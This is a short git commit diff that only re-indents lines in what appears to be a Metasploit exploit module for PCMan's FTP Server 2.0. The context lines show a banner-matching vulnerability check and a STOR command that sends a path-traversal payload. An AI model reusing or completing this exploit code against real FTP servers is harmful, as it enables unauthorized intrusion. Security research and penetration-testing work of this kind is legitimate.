Added minor indentation updates
parent
db8881966e
commit
766e96510d
|
@ -60,7 +60,7 @@ def check
|
|||
if (banner =~ /220 PCMan's FTP Server 2\.0/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -75,5 +75,5 @@ def exploit
|
|||
send_cmd( ["STOR", "/../" + sploit], false )
|
||||
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue